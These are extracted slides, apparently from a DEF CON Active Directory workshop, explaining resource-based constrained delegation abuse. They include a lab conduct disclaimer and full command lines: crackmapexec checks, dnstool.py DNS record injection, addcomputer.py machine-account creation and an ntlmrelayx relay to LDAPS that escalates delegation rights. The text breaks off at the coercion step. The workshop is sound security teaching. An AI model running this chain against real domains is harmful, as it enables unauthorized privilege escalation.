          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>msDS-AllowedToActOnBehalfOfOtherIdentity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>property allows computers to set what users or computers have rights to delegate to them.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This means if we can modify this field on a remote system, we can authenticate as any domain user service to this host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Only accounts with SPNs can be added to that property on a remote system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>MachineAccountQuota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> (MAQ) is larger than 0 (default 10), any low </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> user can create machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>acocunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> with SPN configured </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>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3713050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58</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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Picture Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D47FAD8-9A53-6DD6-E3D2-4A94AE881EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747549" y="3585882"/>
            <a:ext cx="4566356" cy="5143500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84D5D6F7-A3DD-A8C1-718C-09C6D06F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925" y="586364"/>
            <a:ext cx="5289459" cy="397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609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59</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9" name="Picture 18" descr="A picture containing text, screenshot, font&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A29C857-1B5E-7FD6-28AA-67B430A27BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1335645" y="519861"/>
            <a:ext cx="6048019" cy="4172501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338475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Lab Disclaimer</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88050" y="610556"/>
            <a:ext cx="8569927" cy="3820293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Teleport allows us to have command by command sessions of each of your machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>These are all tied directly to your GitHub user name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" i="1" u="sng" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>NOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> use a machine that is not yours.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" i="1" u="sng" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>NOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> do anything malicious to the lab machines that control our AD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Don’t delete or modify files/users/permissions/etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" i="1" u="sng" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>NOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> do anything malicious with other people’s lab machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Follow the Defcon Code of Conduct: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://defcon.org/html/links/dc-code-of-conduct.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>We will kick you out of the workshop if you do bad things.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0"/>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3900705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Prerequisites</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60</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729868"/>
            <a:ext cx="7806549" cy="4058819"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>1. No LDAP Signing on Domain Controllers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>-signing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>2. An account with an SPN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Assuming the machine account quota is set to the default of 10, machine accounts have an SPN configured!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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-u user -p pass -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>maq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>addcomputer.py  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>3. Some form of authentication coercion over HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>HTTP auth coercion can be done with a combination of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> (something older than both presenters) and any standard auth coercion (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>printerbug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>petitpotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>&gt; -u user -p pass -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>cme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>&gt; -u user -p pass -M spooler</a:t>
            </a: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3080325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How To</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61</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649792"/>
            <a:ext cx="8606669" cy="3833705"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>First, we need a DNS record to force HTTP authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>python3 /opt/krbrelayx/dnstool.py -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -a add -r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>uniqueFakeRecord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -d $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>yourIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Second,  create a machine account (account with SPN) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>addcomputer.py domain.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>user:pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Set up your relay in a second terminal window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ntlmrelayx.py -t ldaps://dc01.domain.local -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>wh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>yourIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --delegate-access --escalate-user $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>yourAccountWithAnSPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --no-dump --no-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>acl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --no-da --no-validate-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>privs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Coerce some authentication – Use hostname. No FQDN. </a:t>
            </a:r>
          </a:p>
          <a:p>
